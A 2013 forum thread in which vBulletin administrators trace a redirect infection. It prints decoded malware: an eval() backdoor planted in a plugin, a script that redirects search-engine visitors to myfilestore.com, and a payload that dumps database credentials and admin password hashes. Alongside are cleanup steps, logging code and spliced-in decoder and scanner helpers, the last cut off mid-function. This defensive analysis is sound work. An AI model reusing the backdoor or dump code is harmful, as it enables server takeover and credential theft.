Old 15-04-2013   #1
Management
DoMiN8ToR
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
Vbulletin myfilestore hack - Find the traces and remove them

For our Myce members: this post is to give fellow Vbulletin owners information about a hack we suffered from. This should not have affected our users.

We have been working hard together with fellow forum owners on solving a redirection issue that seems to be infecting thousands of Vbulletin sites. Instead of giving you the usual advice, we have been able to trace back most of the workings of this malware and provide some real working fixes.

Please link to this thread so it gets on top in Google and makes sure we help a lot of other Vbulletin owners!

Index
  1. What happens?
  2. How to find out if you are infected?
  3. What do they do?
  4. How do they get access to your admincp?
  5. What countermeasures can be taken?
  6. Remaining questions

What happens?

If people come from search engines like Google, Bing, Yahoo, Yandex, Rambler or Baidu they end up on another site than yours. They are redirected to any of these sites (please tell us if one is missing):
  • myfilestore.com
  • filestore72.info
  • file2store.info
  • url2short.info
  • filestore123.info
  • url123.info
  • dollarade.com

myfilestore.com and related sites

These websites appear to be affiliate sites that let you download something. Most likely once the installation is done the 'hackers' will receive a fee, or they try to infect people with malware. It's always a good idea to do additional virus scanning when you've ended up on that page. We've also submitted the domains to Google, which will hopefully take measures.

How to find out if your forum is infected?

Most likely your visitors will report that they are redirected to another site when trying to visit your site from search engines. They will likely note one of the sites in the list above.

To reproduce it yourself:
  1. Open a private/incognito window in your browser or clear cache and cookies
  2. Go to either Google, Bing, Yahoo, Yandex, Rambler or Baidu
  3. Search for a term of which you know your site will appear in the search engine
  4. Click a result
  5. If nothing happens, it might be wise to try a couple of times to be sure you're not infected

Besides that, check your datastore:
  • If you're using a file based datastore then get it from /includes/datastore/datastore_cache.php
  • In the database, table datastore and field pluginslist

In either one (best to check both), search for strange code: think of long strings containing random characters, hashes or anything else unusual. The code injected into our site was this:

PHP Code:
// Backdoor key: the POST parameter name checked by the decoded code that follows
$o = 'b5e20b9bb877342f907b745fdd1f42bd';
// Encoded payload (single-quoted, so its characters are taken literally)
$vbg = '<LONG LINE OF ENCODED CRAP WHICH WE REMOVED FOR READABILITY>';
// Two alphabets of equal length; strtr() maps the blob from the first to the second (a simple substitution cipher)
$xml = '$z#rB&_K=ZN;Es4tA6xgw/dof05eU~`:[k3{^ycF}<JbqGM7V!1au,l*.+H8@%j(>C9YT)PR?"X-pQni]LDmO|W2vISh';
$xml2 = '&sL8VZ`g[c+4]N~l3.:0}XwtB>=iebv/FJ*RP,6HO2(?Q_EjK7;9oTh@SYC!5rf)U1{nz#dkmGau^yp$<|M%DW-qI"xA';
// Pattern '#c#' plus modifier characters taken from the tail of the blob (presumably 'e'); with the 'e'
// modifier preg_replace() evaluates the decoded replacement as PHP when the pattern matches the 'c' in 'css'.
// The copy above lost the operators; the separator between the substr() arguments is restored here.
$as = '#c#'.substr($vbg, 3651);
$vbt = preg_replace($as, strtr($vbg, $xml, $xml2), 'css');
The criminals also seem to inject code in plugins. It's a bit hard to find, and they appear to use different methods. It's very important, however, that you find this: with their code they have your site under full control.

Plugin code we found so far

By going through all hooks in misc.php we found that in this file there are only hooks that start with 'misc'.

We went into the plugin manager and searched for plugins that hook into anything starting with 'misc'. In our installation there were only six. By manually opening them we found out that in the plugin 'vBSEO Misc Start', which hooks into 'misc_start', the following code was inserted:

PHP Code:
if(defined('VBSEO_ENABLED')) {
    vbseo_complete_sec('misc_start');   // the legitimate vBSEO line

    // Injected: a request with do=config and an 'e' parameter gets that parameter eval()'d as PHP
    if(isset($_REQUEST['e']) && $_REQUEST['do'] == 'config') {
        eval($_REQUEST['e']);
        die();
    }
}

This means that our server is wide open to hackers. The eval() command can be used to execute any PHP code on our servers, and this code could be fed to eval() by adding some <?php ?> wrapped code to the 'e' parameter.

While we're not sure if we closed the loophole completely, this code is the first thing to disable. You can remove the last 4 lines completely or just comment out the eval line. We added a nice surprise for the hackers if they are calling it again.

Another plugin, reported by Scott. We don't immediately understand why they add this, as the code doesn't seem to be harmful.

PHP Code:
if(preg_match("/image|do=|dateline/i", $_ENV['REQUEST_URI']) || isset($_ENV['QUERY_STRING']) || isset($_POST)) {
} else {
    ob_start();
    ob_implicit_flush(1);
    flush();
    ob_flush();
}
The code they add to the plugins/datastore was decoded and looked like this:

PHP Code:
// Keep the implant quiet: no error output, no error log
$q = 'ini_set';
if(function_exists($q))
{
    $q('display_errors', 0);
    $q('log_errors', 0);
}

// Backdoor: a POST parameter named after the hash in $o is rot13 + base64 decoded and eval()'d
if(isset($_POST[$o]))
    eval(base64_decode(str_rot13($_POST[$o])));

$u = @preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT']);   // crawler?
$s = @parse_url($_SERVER['HTTP_REFERER']);
$t = @$s['host'];
$r = @preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i', $t);   // came from a search engine?
$h = @$_SERVER['HTTP_HOST'];
$p = @COOKIE_PREFIX;
$a = @THIS_SCRIPT === 'misc';
$c = $p.'lastvisit';
$n = $p.'lang_id';    // marker cookie set once a visitor has been redirected
$y = @ord(FILE_VERSION) > 51;   // vBulletin 4 or later ('3' is 51)
$z = empty($_SERVER['HTTP_X_MOZ']);   // not a Firefox prefetch request
$j = '<script type="text/javascript" src="'.$vbulletin->options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;g=js"></script>';

if(empty($_COOKIE[$n]))
{
    // misc.php?v=...&g=js: serve the redirect as JavaScript, but only to a browser that loaded the tag from this host
    if($a && isset($_GET['v']) && (isset($_GET['g'])) && (!empty($_COOKIE[$c])))
    {
        if($t == $h)
        {
            if($z)
                setcookie($n, 'en', time() + 36000);
            $m = substr(md5($h), 0, 8);
            print("document.location='h**p://my****store.com/download.php?id={$m}'");
        }
        exit;
    }
    // Normal page view coming from a search engine (and not from a crawler): inject the script tag into the page head
    if((!$u) && $r)
    {
        if($y)
        {
            $GLOBALS['template_hook']['headinclude_javascript'] .= $j;
        }
        else
        {
            $GLOBALS['style']['css'] .= $j;
        }
    }
}

This means we found out what caused the redirect. We recovered by saving some settings again, which made the datastore refresh, and it was gone.

Besides the changes to the datastore and the plugins, we also found out that they are posting long strings of encoded data to sites. This looks like this:

PHP Code:
$_POST['<SOME KIND OF HASH>'] = 'MJAbolOgMQHbWmWwLmV3Mw ... < ENCODED CRAP ONE AGAIN > ... yzZGWuAmL1BQp5MQt5Z2D4Z2R2Z2MxMQSuWl.....'
And here's the decoded code, don't get scared! We decoded it using

PHP Code:
echo(base64_decode(str_rot13('encrypted string'))); 
(credits ovk)


PHP Code:
// Marker echoed before output buffering starts; the caller looks for it in the response
echo md5('3c4eb64c8db01a5ab261e18fdc16089e');
$oa = array('ecnt' => 0);
// Custom error handler: errors are collected in $oa['e'] instead of being shown or logged
function weh($en, $es, $ef, $el)
{
    global $oa;
    $oa['e'][] = array($en, $es, $ef, $el);
}
set_error_handler('weh');
ini_set('log_errors', 0);
ob_start();
gtadmndtas();

// Dumps the vBulletin database credentials, the vBSEO admin password and every user row
// in an admin-capable usergroup (including password hash and salt)
function gtadmndtas()
{
    $out = $bf = $h = '';
    $ag = array();

    // Locate and include the vBulletin config (DB credentials) and, if present, the vBSEO config.xml
    if(is_file('includes/config.php'))
    {
        include('includes/config.php');
        if(is_file('vbseo/resources/xml/config.xml'))
        {
            $bf = @file_get_contents('vbseo/resources/xml/config.xml');
        }
    }
    elseif(is_file('config.php'))
    {
        include('config.php');
        if(is_file('../vbseo/resources/xml/config.xml'))
        {
            $bf = @file_get_contents('../vbseo/resources/xml/config.xml');
        }
    }
    else
    {
        echo "BD error: config not found\n";
        return;
    }

    // Extract <name>VBSEO_ADMIN_PASSWORD</name><value>...</value> from config.xml
    if(!empty($bf))
    {
        $a = strpos($bf, '<name>VBSEO_ADMIN_PASSWORD</name>');
        if($a !== false)
        {
            $a = strpos($bf, '<value>', $a + 10);
            $b = strpos($bf, '</value>', $a + 7);
            if(($a !== false) && ($b !== false))
            {
                $h = substr($bf, $a + 7, $b - $a - 7);
            }
        }
    }

    $out .= "---------------=-=pong1234321=-=--------------------------<br>\n";
    if(!empty($h))
    {
        $out .= "VBSH: {$h}<br>\n";
    }
    $out .= "ACP: {$config['Misc']['admincpdir']}<br>\n";
    $out .= "dbtype: {$config['Database']['dbtype']}<br>\n";
    $out .= "servername: {$config['MasterServer']['servername']}<br>\n";
    $out .= "port: {$config['MasterServer']['port']}<br>\n";
    $out .= "dbname: {$config['Database']['dbname']}<br>\n";
    $out .= "username: {$config['MasterServer']['username']}<br>\n";
    $out .= "password: {$config['MasterServer']['password']}<br>\n";
    $out .= "tableprefix: {$config['Database']['tableprefix']}<br>\n";
    $out .= "technicalemail: {$config['Database']['technicalemail']}<br>\n";
    $out .= "-----------------------------------------<br>\n";

    echo $out;
    $out = '';
    $gt = "{$config['Database']['tableprefix']}usergroup";
    $mt = "{$config['Database']['tableprefix']}user";

    // Connect with the credentials just read from config.php
    $mysql_conn = mysql_connect("{$config['MasterServer']['servername']}:{$config['MasterServer']['port']}", $config['MasterServer']['username'], $config['MasterServer']['password']);
    if(!$mysql_conn)
    {
        echo "Mysql login failed!";
        return;
    }

    if(!mysql_select_db($config['Database']['dbname'], $mysql_conn))
    {
        echo "Mysql database selection failed!";
        return;
    }

    // Usergroups with admin panel permissions
    $sql = "SELECT usergroupid FROM $gt WHERE adminpermissions>1";
    $res = mysql_query($sql);
    if(!$res)
    {
        $err = mysql_error($mysql_conn);
        echo "Mysql query failed: $err";
        return;
    }

    while($row = mysql_fetch_assoc($res))
    {
        $ag[] = intval($row['usergroupid']);
    }

    // Every user in those groups, with password hash and salt
    $ags = implode(',', $ag);
    $sql = "SELECT userid,username,email,usergroupid,password,salt FROM $mt WHERE usergroupid IN ($ags)";
    $res = mysql_query($sql);
    if(!$res)
    {
        $err = mysql_error($mysql_conn);
        echo "Mysql query failed: $err";
        return;
    }

    while($row = mysql_fetch_assoc($res))
    {
        $data = implode("|:|", $row);
        $data = htmlentities($data);
        $out .= "$data<br>\n";
    }

    $out .= "-----------------------------------------\n<br>\n";
    echo $out;
    $out = '';
}

// Collect the buffered output and wrap it for the response:
// serialize -> gzcompress -> base64 (padding stripped) -> rot13, followed by a second marker
$out = ob_get_contents();
ob_end_clean();
$oa['d'][0] = $out;
$out = serialize($oa);
$out = gzcompress($out, 9);
$out = base64_encode($out);
$out = str_replace('=', '', $out);
$out = str_rot13($out);
echo($out);
echo md5('117ae4783ac97ecf30b2419315518cd1');
exit;
Or pastebin for increased readability: http://pastebin.com/cCd72uZN

What do they do?

We think this is how they do it:
  1. Get access to the admin panel (see below)
  2. Add data to a plugin, both a method to open your entire server to them and the code that inserts javascript on your site and causes the redirection
  3. With this in place, they POST another encrypted string that executes code that reveals passwords etc and allows them to compromise whatever they want

How do they get access to your admin panel?

This part is still a bit of guesswork, but we found some strange URLs being called on our server. We expect that they have more methods, but we can confirm at least one strange thing.

They request URLs like this:

Code:
adminhash = ************************* 
128.2.142.104 160971 - [17/Apr/2013:16:19:43 +0200"POST /?vbseourl%00=admincp/plugin.php" 
These seem to make use of an arbitrary PHP file inclusion issue:

http://www.madirish.net/397


What countermeasures can be taken?

The good news, A LOT!

Credits to ovk

Add this at the top of your yourforum/misc.php

PHP Code:
if($_GET['g']=='js') die; 
This doesn't stop the actual hack, but stops the redirects: it prevents the javascript from executing. It's possible that they change variable names, so check your injected code to see if it's ['g'] or another character.

Credits to Liggy
  • Change the passwords of ALL users that have access to the admin panel or demote them to regular users until you know that they have changed their password. Since the hacker may have access to the user's account, a confirmation via Instant Messenger would be best, as the hacker could send a PM or fake the sender address of an email
  • In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for a code that contains eval($_REQUEST. In our forum that code was inserted into vBSEO Misc Start. They are trying to hide their traces by adding lots of empty lines which will not show their code unless you scroll down. This particular plugin (in the version we have) should only contain the following two lines
    PHP Code:
    if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('misc_start'); 
  • Go back to Plugin Manager, scroll to the end of the page and click Save Active Status. This should remove traces from the pluginlist entry in the datastore table.
  • This step may be optional with the previous one, but just to be sure go to vBulletin Options->vBulletin Options->User Banning options and click Save without changing anything. This should update the datastore_cache.php file
  • If possible, limit the access to your Admin Panel with an additional web server password using e.g. a .htaccess file and provide your admins with the login details.

To verify that there are no traces of the exploit left in your current installation, first take a look at your database. Search the data column in table datastore for the text strtr. (SELECT * FROM datastore WHERE data LIKE '%strtr%') - Future exploits may however use different ways of running their code - no universal method available.

Next check is looking at table adminutil if the entry with title datastore contains the text strtr.

Last step is checking file includes/datastore/datastore_cache.php for text strtr.

Credits to Liggy

Also add this code at the beginning of yourforum/vbseo.php

PHP Code:
// strpos() returns 0 when the match is at the very start of the query string, so compare against false
if (strpos($_SERVER["QUERY_STRING"], '%00') !== false)
    die;
[EDIT by Liggy]You may also send them some greetings like we did [/EDIT]


Remaining questions
  • Did they get access to the admincp using an exploit/backdoor?
  • Did they get access by compromising an admin account, and how?
  • Are our countermeasures successful or will we face another attempt?

Bonus material

If you kept reading, well done! You might want to add some logging to see what's going on and help in our quest to find out everything. Here's some code that you can add to yourforum/includes/config.php

PHP Code:
function DumpToLog($DoPost=false)
{
    // One log file per day in the directory you configure (the copy above lost the '.' before date())
    $logfile = @fopen('{Enter your path here}' . date('Ymd') . '.log', "a");
    if ($logfile)
    {
        if (!empty($_COOKIE["bbuserid"]))
            $bbuser = $_COOKIE["bbuserid"];
        else
            $bbuser = '-';
        if (isset($_SERVER["REMOTE_USER"]))
            $ruser = $_SERVER["REMOTE_USER"];
        else
            $ruser = '-';

        // One line per request: ip bbuserid remote_user [timestamp] "METHOD URI"
        fprintf(
            $logfile, '%s %s %s [%s] "%s %s"%s',
            $_SERVER['REMOTE_ADDR'], $bbuser, $ruser, date('d/M/Y:H:i:s O'), $_SERVER["REQUEST_METHOD"], $_SERVER["REQUEST_URI"], "\n"
        );

        if ($DoPost && ($_SERVER["REQUEST_METHOD"] == "POST"))
        {
            // Written to the log file, not echoed into the HTTP response
            fprintf($logfile, "POST data:\n");
            foreach ($_POST as $postvar => $postvalue)
                fprintf($logfile, "%s = %s\n", $postvar, $postvalue);
        }

        fclose($logfile);
    }
}

DumpToLog(false);
You can change the call from DumpToLog(false) to DumpToLog(true) to also log the POST variables. However this can lead to very big log sizes and add sensitive data like passwords or password hashes to the log file.

(Once again, credits to Liggy!)

Please, if you're reading this and can provide us with additional information, REGISTER and post additional information, also questions are welcome.

Your questions might give us an additional path to trace down the origin of this hack.
__________________
Need some help ? Please use our search function first

Last edited by Liggy; 20-04-2013 at 10:52.
DoMiN8ToR is offline
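Decoding helper, added here as an example and not code from the thread, from vBulletin or from the people quoted above: it undoes the two encodings the first post describes, for an admin who has captured the POSTed parameter or the response of the credential dump in a proxy or tcpdump log. The request side is str_rot13(base64_encode(code)), which the implant reverses with eval(base64_decode(str_rot13($_POST[$o]))); the response side is the chain at the end of the decoded payload, serialize -> gzcompress -> base64_encode -> strip '=' -> str_rot13, bracketed by the two md5() markers it echoes. The function names, the sample data and the zero-filled markers are constructed for this example.

```python
import base64
import codecs
import re
import zlib

MARKER_LEN = 32  # length of the md5 hex markers echoed before and after the body


def decode_request_payload(blob: str) -> bytes:
    """Undo str_rot13(base64_encode(code)) as applied to the POSTed parameter."""
    return base64.b64decode(codecs.decode(blob, "rot13"))


def repad_base64(b64: str) -> str:
    """The implant strips '=' padding before rot13; restore it so b64decode accepts it."""
    return b64 + "=" * (-len(b64) % 4)


def decode_response_payload(resp: str, has_markers: bool = True) -> bytes:
    """Undo rot13 -> base64 -> gzcompress on the response and return the PHP-serialized array."""
    body = resp.strip()
    if has_markers:
        body = body[MARKER_LEN:-MARKER_LEN]
    compressed = base64.b64decode(repad_base64(codecs.decode(body, "rot13")))
    return zlib.decompress(compressed)  # gzcompress() writes a zlib (RFC 1950) stream


def extract_captured_output(serialized: bytes) -> bytes:
    """Pull $oa['d'][0] (the buffered dump) out of serialize() output without a full parser.
    serialize() stores a string as s:<byte length>:"<bytes>"; read the length, then slice."""
    m = re.search(rb's:1:"d";a:1:\{i:0;s:(\d+):"', serialized)
    if not m:
        raise ValueError("no 'd' entry in serialized payload")
    length = int(m.group(1))
    return serialized[m.end():m.end() + length]


# --- constructed sample data so the decoders can be exercised offline (not captured traffic) ---

def encode_request_sample(code: bytes) -> str:
    """Build a parameter value in the same shape as the POSTed one, for testing the decoder."""
    return codecs.encode(base64.b64encode(code).decode("ascii"), "rot13")


def encode_response_sample(output: bytes) -> str:
    """Build a response in the same shape (placeholder markers), for testing the decoder."""
    serialized = b'a:2:{s:4:"ecnt";i:0;s:1:"d";a:1:{i:0;s:%d:"%s";}}' % (len(output), output)
    b64 = base64.b64encode(zlib.compress(serialized, 9)).decode("ascii").rstrip("=")
    marker = "0" * MARKER_LEN  # stands in for the md5() markers
    return marker + codecs.encode(b64, "rot13") + marker


if __name__ == "__main__":
    sample = encode_response_sample(b"---pong1234321---\nACP: admincp\n")
    print(extract_captured_output(decode_response_payload(sample)).decode())
```

Paste the body of a captured response into decode_response_payload() (with has_markers=False if you cut the markers off yourself); the serialized array also carries the collected PHP errors under 'e', which the regex above deliberately skips.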
Old 15-04-2013   #2
ovk
New Member
Join Date: Apr 2013
Location: Craiova, RO
Posts: 18
Hello,

thank you for this thread, my site was also hit by this trojan and for the last few days I've been (unsuccessfully so far) trying to find the root of the attack.
While on my board I didn't find the modified misc_start plugin, I did find a different version of the encrypted code you posted in the pluginlist datastore record.
Consisting of a few assigns and a preg_replace, I don't really understand how that code becomes an eval() but it does seem to cause the redirect by adding a <script> tag in the site's header pointing to misc.php?v=413&g=js that outputs a document.location statement.
Of course, removing that code from the datastore is very simple by opening and saving any plugin, but after some time (about 12 hours) the code comes back. That means that my site has a yet undetected backdoor that is used to inject the code in the datastore.

Until I find a permanent solution, I have stopped the redirections by adding this line of code on the first line of misc.php:
PHP Code:
if($_GET['g']=='js') die;
This way, even if the <script> is injected, it doesn't do anything.
ovk is offline
Old 15-04-2013   #3
Administrator & Reviewer
Wombler
Join Date: Apr 2005
Location: Northern Ireland
Posts: 12,770
I'm just glad we've got such experts on the case as that looks very complicated to trace.


Wombler
__________________
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Forum Help: Forum Rules, Myce Help Centre
If you find these forums useful then: Register Here
DVDFab/ImgBurn: Choosing the correct Layer Break Position in ImgBurn
DVDFab: BDMV-REC Supported Burners
Reviews: Ideal DVD Copy, Magic DVD Copier, DVDFab DVD Copy v9

Wombler is offline
Old 15-04-2013   #4
Management
DoMiN8ToR
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
Hi ovk, thanks for your report. Maybe we can hook up and work together on getting this down? I would also like to write a script to detect it, but we already thought it might be useless as the infection seems to change a lot. All we can do now is manual checks. But if we can find something that is common it could help.

If you like, send me a PM with your e-mail address and we can hook up (or your skypename if you use it...)
DoMiN8ToR is offline
Old 16-04-2013   #5
Management
DoMiN8ToR
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
We were hit again, the code returned and our trap wasn't used. This will be another day of investigations...
DoMiN8ToR is offline
Old 16-04-2013   #6
ovk
New Member
Join Date: Apr 2013
Location: Craiova, RO
Posts: 18
Hi

my e-mail addy is the one I used to create my profile here.
I'll keep you posted with updates here nevertheless.
For now I have removed the code from the datastore and started sniffing http requests using tcpdump.
Hopefully when the malicious code gets re-inserted in the datastore I'll have some detail on how it was done in the tcpdump logs.

I strongly believe it has something to do with vbseo even if they deny it on their forums.
ovk is offline
Old 16-04-2013   #7
Senior Administrator
Liggy
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
Yesterday it helped to rebuild the datastore by applying user banning options again, today this does not help. So it also seems to be hidden somewhere else.
__________________
You need to flash or dump your NEC DVD burner firmwares on your Mac, Windows, DOS or Linux machine? Just try Binflash.
Visit Liggy's and Dee's Optiarc and NEC firmware and tools page for all kind of information about NEC and Optiarc drives.


Unrequested PM about drive problems will not be answered!
Liggy is offline
Old 16-04-2013   #8
Senior Administrator & Reviewer
Seán
Join Date: Jun 2002
Location: Republic of Ireland (North West)
Posts: 11,180
I wonder if a scheduled process was planted. For example, if the time stamp of the modified php file always ends in let's say ':19' every time it gets hit again, this would indicate a possible scheduled process sitting on our server reinfecting the file.

Wish you all the best solving this.
Seán is offline
Old 16-04-2013   #9
Administrator & Reviewer
Wombler
Join Date: Apr 2005
Location: Northern Ireland
Posts: 12,770
Yeah it sounds like a real pain this one.

Time consuming too.


Wombler
Wombler is offline
Old 16-04-2013   #10
Senior Administrator
Liggy
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
Found that crap in the pluginlist entry in table datastore too. Looking at the details around this code, it should have come from vBSEO hook location cache_template / title vBSEO Cache Templates, but looking at it in the admin panel, it only contained the standard
PHP Code:
if(defined('VBSEO_ENABLED'))
vbseo_complete_sec('cache_templates'); 
Saving that one unmodified removed it from the table. Next step was saving the current user banning settings, which re-created the datastore cache and also removed it from the datastore_cache.php file - let's wait and see how long it takes to come back this time.
Liggy is offline
Old 16-04-2013   #11
Management
DoMiN8ToR
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
@Liggy, in the database, before the hashes they insert, there was also a lot of whitespace. I thought maybe they want to hide the code somewhere in a plugin, so if you look at it in the admincp you don't see it in the input box because you would need to scroll a lot. But I couldn't find any trace of this
DoMiN8ToR is offline
Old 16-04-2013   #12
Management
DoMiN8ToR
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
We also found two images in /images/misc trying to confirm if this is ours or was uploaded by the hackers.
DoMiN8ToR is offline
Old 16-04-2013   #13
Senior Administrator
Liggy
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
These images were mine. I was trying something, but don't remember what.
Liggy is offline
Old 16-04-2013   #14
Management
DoMiN8ToR
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
Liggy just found out that they had access to an admin account. Someone who didn't login for a long time. Probably because that would go unnoticed for a while...
DoMiN8ToR is offline
Old 16-04-2013   #15
Senior Administrator
Liggy
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
I wrote a small routine to generate a custom logfile and added the code to config.php so it's executed every time a forum routine is called.
PHP Code:
function DumpToLog()
{
    // One log file per day in the directory you configure (the copy above lost the '.' before date())
    $logfile = @fopen('{Enter your path here}' . date('Ymd') . '.log', "a");
    if ($logfile)
    {
        if (!empty($_COOKIE["bbuserid"]))
            $bbuser = $_COOKIE["bbuserid"];
        else
            $bbuser = '-';
        if (isset($_SERVER["REMOTE_USER"]))
            $ruser = $_SERVER["REMOTE_USER"];
        else
            $ruser = '-';

        // One line per request: ip bbuserid remote_user [timestamp] "METHOD URI"
        fprintf(
            $logfile, '%s %s %s [%s] "%s %s"%s',
            $_SERVER['REMOTE_ADDR'], $bbuser, $ruser, date('d/M/Y:H:i:s O'), $_SERVER["REQUEST_METHOD"], $_SERVER["REQUEST_URI"], "\n"
        );
        fclose($logfile);
    }
}

DumpToLog();
It doesn't verify the password for the user - but for logging this kind of problems, that should be sufficient. Before adding the code, make sure to add your logging path and that it provides enough disk space. If you comment the DumpToLog() here and add it to different (suspicious) routines, you can reduce the log size, but potentially miss calls you should have logged.
Liggy is offline
Old 16-04-2013   #16
ovk
New Member
Join Date: Apr 2013
Location: Craiova, RO
Posts: 18
I confirm that the bot that inserted this code into my datastore also had access to one of my administrators' accounts. It still doesn't explain a lot of things and I strongly believe that it's not the root of our problem.

Still investigating
ovk is offline
Old 16-04-2013   #17
Senior Administrator & Reviewer
Arachne
Join Date: Nov 2005
Location: Tabby Towers, West of England
Posts: 33,938
Looks like a right little smegger with all the re-infections, nice job with the investigating guys
__________________
RIP Baz 8/1997-11/2013 - love ya buddy

How to delete your upper and lower filters : How to check/enable DMA by Womble

Click here to join MyCE.com and be part of our friendly community!

Smile...people will wonder what you're up to
Arachne is offline
Old 16-04-2013   #18
Administrator & Reviewer
Wombler
Join Date: Apr 2005
Location: Northern Ireland
Posts: 12,770
Quote:
Originally Posted by DoMiN8ToR View Post
Liggy just found out that they had access to an admin account. Someone who didn't login for a long time. Probably because that would go unnoticed for a while...
That's not great news but at least Liggy found it and has taken action.


Wombler
Wombler is offline
Old 17-04-2013   #19
New Member
Join Date: Apr 2013
Location: North Carolina
Posts: 11
I googled and found this thread, I joined just to post in this thread. The crappy "myfilestore" hack has been giving me a fit for over a year now and no one knows how or what to do. If you google it you will see vBulletin says it's not them, vBseo says it's not them. I don't know but I sure as hell hope you guys figure it out.

Like I said it's been messing with my boards for over a year and it's costing me money just from the drop of daily visitors to my board that come through a search engine.

I am at my wits' end with this hack. All I have been doing every damn day is disabling and enabling a product and the hack is gone for a few hours.


My bad is I stepped out of line on your board, that was not my intent, I am just so frustrated with this hack.
br54910 is offline
Old 17-04-2013   #20
New Member
Join Date: Apr 2013
Location: North Carolina
Posts: 11
FYI WHM/cPanel can't be part of this since my servers have no control panel installed at all.

Also I ran across this just a few minutes ago and just thought I would throw it out here.

http://www.vbseo.com/blogs/rafael-be...w-prevent-361/
br54910 is offline
Old 17-04-2013   #21
MyCE Rookie
Join Date: Apr 2013
Posts: 24
Like br54910, I found this via Google and so far it is the most up-to-date info I've found. I'm not running register_globals (and I would assume club.myce.com isn't either) and none of the other threads of info have helped. I haven't bothered with vBulletin/vBSEO support due to the reception others are getting.

The issue has only started happening on my forum in the last couple of weeks. I'm running vB4.2.0PL3, and was running vBSEO3.6.0, now running .1.

Haven't found any odd additions in any of templates/plugins/etc, any odd files or anything either.

I'm currently going through my httpd server logs - Will post up if I find anything.
stubbed is offline
Old 17-04-2013   #22
MyCE Resident
cholla
Join Date: Jul 2007
Location: Amarillo ,Texas
Posts: 8,162
I don't know if this will help but here goes. I'm posting from my laptop because Avast on my desktop found what it thought was a VIRUS when I clicked on the thread.
I have AVG on the laptop & it didn't.
The desktop works on all other threads on the forum.
This one now gives me the :
Quote:
Internet Explorer cannot display the webpage
This is the URL I got when this happened:
http://club.myce.com/f20/vbulletin-m...e-them-332219/
These are the two Avast windows:
[attachments: CM01.jpg, CM02.jpg]

This is all the information I know I have right now.
If there is any more I can give you, let me know.
__________________
cholla pronounced ˈchȯi-yə click on cholla to hear
cholla is offline
Old 17-04-2013   #23
MyCE Rookie
Join Date: Apr 2013
Posts: 24
^-- That's because "myfilestore" is a known spyware site. My users running the same software reported the error, that's when I stumbled onto the issue.

Doesn't help in fixing it though
stubbed is offline
Old 17-04-2013   #24
Senior Administrator
Liggy
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
Quote:
Originally Posted by br54910 View Post
I am at my wits' end with this hack. All I have been doing every damn day is disabling and enabling a product and the hack is gone for a few hours.
Quote:
Originally Posted by stubbed View Post
Haven't found any odd additions in any of templates/plugins/etc, any odd files or anything either.
My idea on trying to fix it is the following:
  • Change the passwords of ALL users that have access to the admin panel or demote them to regular users until you know that they have changed their password. Since the hacker may have access to the user's account, a confirmation via Instant Messenger would be best, as the hacker could send a PM or fake the sender address of an email
  • In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for a code that contains eval($_REQUEST. In our forum that code was inserted into vBSEO Misc Start. They are trying to hide their traces by adding lots of empty lines which will not show their code unless you scroll down. This particular plugin (in the version we have) should only contain the following two lines
    PHP Code:
    if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('misc_start'); 
  • Go back to Plugin Manager, scroll to the end of the page and click Save Active Status. This should remove traces from the pluginlist entry in the datastore table.
  • This step may be optional with the previous one, but just to be sure go to vBulletin Options->vBulletin Options->User Banning options and click Save without changing anything. This should update the datastore_cache.php file
  • If possible, limit the access to your Admin Panel with an additional web server password using e.g. a .htaccess file and provide your admins with the login details.
To verify that there are no traces of the exploit left in your current installation, first take a look at your database. Search the data column in table datastore for the text strtr. (SELECT * FROM datastore WHERE data LIKE '%strtr%') - Future exploits may however use different ways of running their code - no universal method available.
Next check is looking at table adminutil if the entry with title datastore contains the text strtr.

Last step is checking file includes/datastore/datastore_cache.php for text strtr.

As a final countermeasure you can modify file misc.php and include the following commands at the beginning, right after the error_reporting command:
PHP Code:
// guard with isset() so the check does not throw an undefined-index notice on normal requests
if(isset($_GET['g']) && $_GET['g']=='js')
    die; 
This code will not prevent you from being hacked but prevents the current exploit from redirecting your visitors.

Quote:
Originally Posted by br54910 View Post
My bad is I stepped out of line on your board, that was not my intent, I am just so frustrated with this hack.
I didn't see anything out of line. Your comments were very welcome.
__________________
You need to flash or dump your NEC DVD burner firmwares on your Mac, Windows, DOS or Linux machine? Just try Binflash.
Visit Liggy's and Dee's Optiarc and NEC firmware and tools page for all kind of information about NEC and Optiarc drives.


Unrequested PM about drive problems will not be answered!
Liggy is offline
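A small scanner for the checks in Liggy's list (misc_start plugins carrying eval($_REQUEST, strtr in the datastore/adminutil blobs), as an added example that is not Liggy's or vBulletin's code; the plugin rows and datastore blob it runs over are constructed, and the function names are assumptions.

```python
"""Detector for the traces listed above: plugins hooked at misc_start that
carry eval($_REQUEST, and strtr in datastore / adminutil / datastore_cache.php.
Added example, not Liggy's or vBulletin's code. The rows and blob below are
constructed; a real run would feed it the rows returned by
SELECT title, hookname, phpcode FROM plugin and the data column blobs."""
import re

# Markers named in the thread.
MARKERS = {
    "eval_request": re.compile(r"eval\s*\(\s*\$_(?:REQUEST|GET|POST)\b"),
    "strtr": re.compile(r"\bstrtr\s*\("),
}

# The only two lines the vBSEO Misc Start plugin should contain (per the post).
EXPECTED_VBSEO_MISC_START = ["if(defined('VBSEO_ENABLED'))",
                             "vbseo_complete_sec('misc_start');"]

def find_markers(text):
    """Return (line_no, marker_name) per hit. The line number exposes the
    padding trick: a payload parked behind hundreds of blank lines."""
    hits = []
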